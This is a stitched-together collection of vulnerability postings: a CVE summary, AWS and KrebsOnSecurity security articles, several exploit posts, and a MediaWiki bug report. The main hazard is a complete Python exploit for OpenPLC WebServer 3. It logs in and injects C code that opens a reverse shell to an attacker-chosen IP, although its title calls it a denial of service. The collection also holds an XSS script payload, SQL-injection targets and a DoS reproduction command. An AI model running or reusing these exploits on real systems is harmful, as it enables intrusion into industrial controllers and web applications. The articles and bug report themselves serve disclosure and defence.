A vulnerability was found in Translator PoqDev Add-On 1.0.11 on Firefox. It has been rated as problematic. This issue affects some unknown processing of the component Select Text Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-241649 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-5496

OpenPLC WebServer version 3 suffers from a denial of service vulnerability.

    # Exploit Title: OpenPLC WebServer 3 - Denial of Service# Date: 10.09.2023# Exploit Author: Kai Feng# Vendor Homepage: https://autonomylogic.com/# Software Link: https://github.com/thiagoralves/OpenPLC_v3.git# Version: Version 3 and 2# Tested on: Ubuntu 20.04import requestsimport sysimport timeimport optparseimport reparser = optparse.OptionParser()parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login")parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection")parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection")options, args = parser.parse_args()if not options.url:    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    print('[+] Specify an url target')    print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444")    exit()host = options.urllogin = options.url + '/login' upload_program = options.url + '/programs'compile_program = options.url + '/compile-program?file=681871.st' run_plc_server = options.url + '/start_plc'user = options.userpassword = options.passwrev_ip = options.riprev_port = options.rportx = requests.Session()def auth():    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    time.sleep(1)    print('[+] Checking if host '+host+' is Up...')    host_up = x.get(host)    try:        if host_up.status_code == 200:            print('[+] Host Up! ...')    except:        print('[+] This host seems to be down :( ')        sys.exit(0)    print('[+] Trying to authenticate with credentials '+user+':'+password+'')     time.sleep(1)       submit = {        'username': user,        'password': password    }    x.post(login, data=submit)    response = x.get(upload_program)                if len(response.text) > 30000 and response.status_code == 200:        print('[+] Login success!')        time.sleep(1)    else:        print('[x] Login failed :(')        sys.exit(0)  def injection():    print('[+] PLC program uploading... ')    upload_url = host + "/upload-program"     upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"}    upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"}     upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n  VAR\n    var_in : BOOL;\n    var_out : BOOL;\n  END_VAR\n\n  var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n  RESOURCE Res0 ON PLC\n    TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n    PROGRAM Inst0 WITH Main : prog0;\n  END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n"    upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)    act_url = host + "/upload-program-action"    act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"}    act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n"    upload_act = x.post(act_url, headers=act_headers, data=act_data)    time.sleep(2)def connection():    print('[+] add device...')    inject_url = host + "/add-modbus-device"    # inject_dash = host + "/dashboard"    inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"}    inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"}    inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111                                # \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n   \r\n    \r\n    \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n    int port = "+rev_port+";\r\n    struct sockaddr_in revsockaddr;\r\n\r\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n    revsockaddr.sin_family = AF_INET;       \r\n    revsockaddr.sin_port = htons(port);\r\n    revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n    connect(sockt, (struct sockaddr *) &revsockaddr, \r\n    sizeof(revsockaddr));\r\n    dup2(sockt, 0);\r\n    dup2(sockt, 1);\r\n    dup2(sockt, 2);\r\n\r\n    char * const argv[] = {\"/bin/sh\", NULL};\r\n    execve(\"/bin/sh\", argv, NULL);\r\n\r\n    return 0;  \r\n    \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n"    inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data)    time.sleep(3)    # comp = x.get(compile_program)    # time.sleep(6)    # x.get(inject_dash)    # time.sleep(3)    # print('[+] Spawning Reverse Shell...')    start = x.get(run_plc_server)    time.sleep(1)    if start.status_code == 200:        print('[+] Reverse connection receveid!')         sys.exit(0)    else:        print('[+] Failed to receive connection :(')        sys.exit(0)auth()injection()connection()

OpenPLC WebServer 3 Denial Of Service

The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.

**Publication Date: 2023/10/10 05:00 AM PDT  
**

AWS is aware of CVE-2023-44487, also known as "HTTP/2 Rapid Reset Attack," related to HTTP/2 capable web servers where rapid stream generation and cancellation can result in additional load which could lead to a Denial of Service. AWS infrastructure is designed with various protections to address Layer 7 request floods, we have implemented additional mitigations to address this issue. AWS also recommends customers who operate their own HTTP/2 capable web servers verify with their web server vendor to determine if they are affected and, if so, install the latest patches from their respective vendors to address this issue..

Customers can learn more about this in the AWS Security blog post, titled "How AWS Protects Customers from DDoS Events".

Security-related questions or concerns can be brought to our attention via aws-security@amazon.com.

AWS support for Internet Explorer ends on 07/31/2022. Supported browsers are Chrome, Firefox, Edge, and Safari. Learn more »

CVE-2023-44487: CVE-2023-44487 - HTTP/2 Rapid Reset Attack

Recent weeks have seen a sizable uptick in the number of phishing scams targeting U.S. Postal Service (USPS) customers. Here's a look at an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries worldwide.

The fake USPS phishing page.

Recent weeks have seen a sizable uptick in the number of phishing scams targeting **U.S. Postal Service** (USPS) customers. Here’s a look at an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.

KrebsOnSecurity recently heard from a reader who received an SMS purporting to have been sent by the USPS, saying there was a problem with a package destined for the reader’s address. Clicking the link in the text message brings one to the domain **usps.informedtrck\[.\]com**.

The landing page generated by the phishing link includes the USPS logo, and says “Your package is on hold for an invalid recipient address. Fill in the correct address info by the link.” Below that message is a “Click update” button that takes the visitor to a page that asks for more information.

The remaining buttons on the phishing page all link to the real USPS.com website. After collecting your address information, the fake USPS site goes on to request additional personal and financial data.

This phishing domain was recently registered and its WHOIS ownership records are basically nonexistent. However, we can find some compelling clues about the extent of this operation by loading the phishing page in Developer Tools, a set of debugging features built into Firefox, Chrome and Safari that allow one to closely inspect a webpage’s code and operations.

Check out the bottom portion of the screenshot below, and you’ll notice that this phishing site fails to load some external resources, including an image from a link called **fly.linkcdn\[.\]to**.

Click the image to enlarge.

A search on this domain at the always-useful URLscan.io shows that **fly.linkcdn\[.\]to** is tied to a slew of USPS-themed phishing domains. Here are just a few of those domains (links defanged to prevent accidental clicking):

usps.receivepost\[.\]com  
usps.informedtrck\[.\]com  
usps.trckspost\[.\]com  
postreceive\[.\]com  
usps.trckpackages\[.\]com  
usps.infortrck\[.\]com  
usps.quicktpos\[.\]com  
usps.postreceive\].\]com  
usps.revepost\[.\]com  
trackingusps.infortrck\[.\]com  
usps.receivepost\[.\]com  
usps.trckmybusi\[.\]com  
postreceive\[.\]com  
tackingpos\[.\]com  
usps.trckstamp\[.\]com  
usa-usps\[.\]shop  
usps.infortrck\[.\]com  
unlistedstampreceive\[.\]com  
usps.stampreceive\[.\]com  
usps.stamppos\[.\]com  
usps.stampspos\[.\]com  
usps.trckmypost\[.\]com  
usps.trckintern\[.\]com  
usps.tackingpos\[.\]com  
usps.posinformed\[.\]com

As we can see in the screenshot below, the developer tools console for informedtrck\[.\]com complains that the site is unable to load a **Google Analytics** code — **UA-80133954-3** — which apparently was rejected for pointing to an invalid domain.

Notice the highlighted Google Analytics code exposed by a faulty Javascript element on the phishing website. Click to enlarge. That code actually belongs to the USPS.

The valid domain for that Google Analytics code is the official usps.com website. According to **dnslytics.com**, that same analytics code has shown up on at least six other nearly identical USPS phishing pages dating back nearly as many years, including **onlineuspsexpress\[.\]com**, which **DomainTools.com** says was registered way back in September 2018 to an individual in Nigeria.

A different domain with that same Google Analytics code that was registered in 2021 is **peraltansepeda\[.\]com**, which **archive.org** shows was running a similar set of phishing pages targeting USPS users. DomainTools.com indicates this website name was registered by phishers based in Indonesia.

DomainTools says the above-mentioned USPS phishing domain **stamppos\[.\]com** was registered in 2022 via Singapore-based **Alibaba.com**, but the registrant city and state listed for that domain says “Georgia, AL,” which is not a real location.

Alas, running a search for domains registered through Alibaba to anyone claiming to reside in Georgia, AL reveals nearly 300 recent postal phishing domains ending in “.top.” These domains are either administrative domains obscured by a password-protected login page, or are .top domains phishing customers of the USPS as well as postal services serving other countries.

Those other nations include the Australia Post, An Post (Ireland), Correos.es (Spain), the Costa Rican post, the Chilean Post, the Mexican Postal Service, Poste Italiane (Italy), PostNL (Netherlands), PostNord (Denmark, Norway and Sweden), and Posti (Finland). A complete list of these domains is available here (PDF).

A phishing page targeting An Post, the state-owned provider of postal services in Ireland.

The Georgia, AL domains at Alibaba also encompass several that spoof sites claiming to collect outstanding road toll fees and fines on behalf of the governments of Australia, New Zealand and Singapore.

An anonymous reader wrote in to say they submitted fake information to the above-mentioned phishing site usps.receivepost\[.\]com via the malware sandbox **any.run**. A video recording of that analysis shows that the site sends any submitted data via an automated bot on the Telegram instant messaging service.

The traffic analysis just below the any.run video shows that any data collected by the phishing site is being sent to the Telegram user @chenlun, who offers to sell customized source code for phishing pages. From a review of @chenlun’s other Telegram channels, it appears this account is being massively spammed at the moment — possibly thanks to public attention brought by this story.

Meanwhile, researchers at DomainTools recently published a report on an apparently unrelated but equally sprawling SMS-based phishing campaign targeting USPS customers that appears to be the work of cybercriminals based in Iran.

Phishers tend to cast a wide net and often spoof entities that are broadly used by the local population, and few brands are going to have more household reach than domestic mail services. In June, the **United Parcel Service** (UPS) disclosed that fraudsters were abusing an online shipment tracking tool in Canada to send highly targeted SMS phishing messages that spoofed the UPS and other brands.

With the holiday shopping season nearly upon us, now is a great time to remind family and friends about the best advice to sidestep phishing scams: Avoid clicking on links or attachments that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of negative consequences should you fail to respond or act quickly.

If you’re unsure whether the message is legitimate, take a deep breath and visit the site or service in question manually — ideally, using a browser bookmark so as to avoid potential typosquatting sites.

Update: Added information about the Telegram bot and any.run analysis.

Phishers Spoof USPS, 12 Other Natl’ Postal Services

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

**eClass Junior 4.0 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | fe25bf20628b95e728482b08a8d3f9ce6bd4e732844de33554a5951468322a2a

Download | Favorite | View

**eClass Junior 4.0 SQL Injection**

    ====================================================================================================================================| # Title     : eClass Junior 4.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-junior/                                                                |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

eClass Junior 4.0 SQL Injection

eClass IP version 2.5 suffers from a remote SQL injection vulnerability.

**eClass IP 2.5 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass IP version 2.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | b711babfc66671ea5103fe26d521747c60621f2c26be69bc9fb4ef7463b6da31

Download | Favorite | View

**eClass IP 2.5 SQL Injection**

    ====================================================================================================================================| # Title     : eClass IP 2.5 Sql injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-ip/                                                                    |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55&id=161 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55&id=161[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

eClass IP 2.5 SQL Injection

Chicv Management System Login version 4.5.6 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Chicv Management System Login v4.5.6 IDOR Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            | | # Vendor    : https://chicv.com/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/#/home[+] https://127.0.0.wwwjustfashionnowcom/admin/#/homeGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Chicv Management System Login 4.5.6 Insecure Direct Object Reference

Aicte India LMS version 3.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Aicte india LMS 3.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.facebook.com/OfficialAICTE/                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /committee.php?n=ANTI-RAGGING'"()%26%25<acx><ScRiPt >prompt(926233)</ScRiPt>[+] http://vtcbcsreduin/committee.php?n=ANTI-RAGGING%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(926233)%3C/ScRiPt%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Aicte India LMS 3.0 Cross Site Scripting

An issue was discovered in the CheckUser extension for MediaWiki before 1.35.12, 1.36.x through 1.39.x before 1.39.5, and 1.40.x before 1.40.1. A user can use a rest.php/checkuser/v0/useragent-clienthints/revision/ URL to store an arbitrary number of rows in cu_useragent_clienthints, leading to a denial of service.

**

User can store arbitrary number of rows in cu\_useragent\_clienthints

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

When sending client hints data, the brands and fullVersionList fields are a list. Each member of these lists is inserted as a separate row in the cu\_useragent\_clienthints table.

There does not seem to be a limit to the number of items a user can put in these lists. I was able to submit a client hints request with 10000 entries in both of these fields, and 20000 rows were inserted in to the database.

This could be a possible vector for denial of service.

**Reproduction**

1.  Setup a wiki with CheckUser and enable client hints (they are enabled by default, you shouldn't need to do anything)
2.  Make an edit in Firefox (which does not support client hints)
3.  Find out the revision ID of the edit you just made
4.  Run this command, changing <rev id> to the revision ID you just found. You might need to change the address of the server as well:

curl 'http://localhost:8080/w/rest.php/checkuser/v0/useragent-clienthints/revision/<rev id>' -H 'Content-Type: application/json' \\
  --data-raw '{"architecture":"","bitness":"64","brands":\[{"brand": "Test Brand", "version": "0"}, {"brand": "Test Brand", "version": "1"}, {"brand": "Test Brand", "version": "2"}, {"brand": "Test Brand", "version": "3"}, {"brand": "Test Brand", "version": "4"}, {"brand": "Test Brand", "version": "5"}, {"brand": "Test Brand", "version": "6"}, {"brand": "Test Brand", "version": "7"}, {"brand": "Test Brand", "version": "8"}, {"brand": "Test Brand", "version": "9"}\],"fullVersionList":\[{"brand": "Test Version", "version": "0"}, {"brand": "Test Version", "version": "1"}, {"brand": "Test Version", "version": "2"}, {"brand": "Test Version", "version": "3"}, {"brand": "Test Version", "version": "4"}, {"brand": "Test Version", "version": "5"}, {"brand": "Test Version", "version": "6"}, {"brand": "Test Version", "version": "7"}, {"brand": "Test Version", "version": "8"}, {"brand": "Test Version", "version": "9"}\],"mobile":false,"model":"","platform":"Linux","platformVersion":"5.10.0"}'

5.  Go to the database and run SELECT \* FROM cu\_useragent\_clienthints;

**Other information**

Only wmf and the master branch of CheckUser has this issue. There will be no need to keep this private after the patch is in production as only local testing wikis should have this issue until it's merged into the master branch.

Risk Rating

Medium

Author Affiliation

WMF Product

*   Mentions

**Event Timeline**

Dreamy\_Jazz triaged this task as High priority.

Comment Actions

I will write a patch.

There are a few ways to get this fixed that I can see:

1.  Disable collection of Client Hints globally until this is fixed (and then a fix can be written normally)
2.  Temporarily disable collection, deploy a security patch and then re-enable collection.
3.  Deploy a security patch without disabling collection

Comment Actions

Proposed patch:

This patch includes the fix and also adding a new testcase to an existing test to check that the fix worked. I've tested this locally and this seems to fix the issue.

Comment Actions

> Proposed patch:
> 
> This patch includes the fix and also adding a new testcase to an existing test to check that the fix worked. I've tested this locally and this seems to fix the issue.

virtual +2 from me. @Dreamy\_Jazz is making some minor changes to the commit message.

Comment Actions

Modified proposed patch:

Changes were to fix the commit message and to add an inline comment to the array\_splice call on the suggestion of Kosta.

Comment Actions

> Modified proposed patch:
> 
> Changes were to fix the commit message and to add an inline comment to the array\_splice call on the suggestion of Kosta.

+2, thank you.

Comment Actions

> @thcipriani just synced this.

Is there a SAL entry for this? I couldn't find an obvious one. Also now tracking at T276237 and T340874.

Comment Actions

> > @thcipriani just synced this.
> 
> Is there a SAL entry for this? I couldn't find an obvious one. Also now tracking at T276237 and T340874.

No, I don't see one.

@sbassett are we OK to proceed with creating a patch in Gerrit for this, and making this task public?

Comment Actions

> @sbassett are we OK to proceed with creating a patch in Gerrit for this, and making this task public?

Yes, that's fine. Once an issue is patched in Wikimedia production and if it doesn't belong to a bundled component, then it can be disclosed and backported. We'll disclose it again via the end-of-quarter supplemental security release as well (T340874).

Comment Actions

> > @sbassett are we OK to proceed with creating a patch in Gerrit for this, and making this task public?
> 
> Yes, that's fine. Once an issue is patched in Wikimedia production and if it doesn't belong to a bundled component, then it can be disclosed and backported. We'll disclose it again via the end-of-quarter supplemental security release as well (T340874).

The vulnerability has only existed in the master and wmf branches, so not sure if it needs to be backported when making the fix public as no release versions included it. This may also mean that it doesn't need to be stated in the end-of-quarter supplemental security release as the fix would not be included in any of these releases (due to the vulnerability not existing in any release version).

Comment Actions

> The vulnerability has only existed in the master and wmf branches, so not sure if it needs to be backported when making the fix public as no release versions included it. This may also mean that it doesn't need to be stated in the end-of-quarter supplemental security release as the fix would not be included in any of these releases (due to the vulnerability not existing in any release version).

